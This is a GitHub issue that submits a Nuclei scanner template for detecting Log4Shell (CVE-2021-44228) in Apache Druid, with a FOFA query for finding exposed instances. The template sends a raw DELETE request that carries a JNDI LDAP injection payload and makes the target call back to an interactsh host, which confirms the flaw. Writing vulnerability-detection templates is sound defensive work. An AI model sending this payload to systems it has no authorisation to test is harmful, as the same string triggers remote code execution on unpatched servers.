### ISSUE TITLE
Apache Druid Log4shell CVE-2021-44228

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7965]
### Template Information:

Apache Druid Log4shell CVE-2021-44228
fofa: title=="Apache Druid"

### Nuclei Template:

```yaml
id: apache-druid-log4shell

info:
  name: Apache Druid Log4shell CVE-2021-44228
  author: SleepingBag945
  severity: critical
  description: |
    Apache Druid存在log4j漏洞。
  metadata:
    fofa-query: title=="Apache Druid"
  tags: rce

http:
  - raw:
      - |
        DELETE /druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d  HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"
```
